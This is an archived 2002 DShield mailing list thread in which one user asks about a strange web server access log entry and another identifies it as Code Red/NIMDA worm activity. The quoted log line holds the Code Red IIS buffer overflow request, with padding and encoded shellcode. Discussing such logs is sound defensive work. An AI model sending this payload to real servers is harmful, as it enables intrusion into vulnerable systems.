[Dshield] server access log question

Shawn.Wilkerson@Firstdoor.com Shawn.Wilkerson at Firstdoor.com
Wed Oct 16 13:31:10 GMT 2002


It's Code Red/NIMDA - I've seen increasing activity from the APNIC and RIPE
which of course makes it a lot of "fun" trying to track down the data center
that maintains the infected servers.
 

-----Original Message-----
From: Susan Buczak [mailto:sbuczak2 at comcast.net]
Sent: Tuesday, October 15, 2002 10:58 AM
To: list at dshield.org
Subject: [Dshield] server access log question


Does anyone know what an entry like this in a server access log means:

65.88.244.4 - - [12/Oct/2002:03:01:16 -0400] "GET 
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%
u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a 
  HTTP/1.0" 400 252 "-" "-"


Thank you,
Susan

_______________________________________________
Dshield mailing list
Dshield at dshield.org
To change your subscription options (or unsubscribe), see:
http://www.dshield.org/mailman/listinfo/list




More information about the list mailing list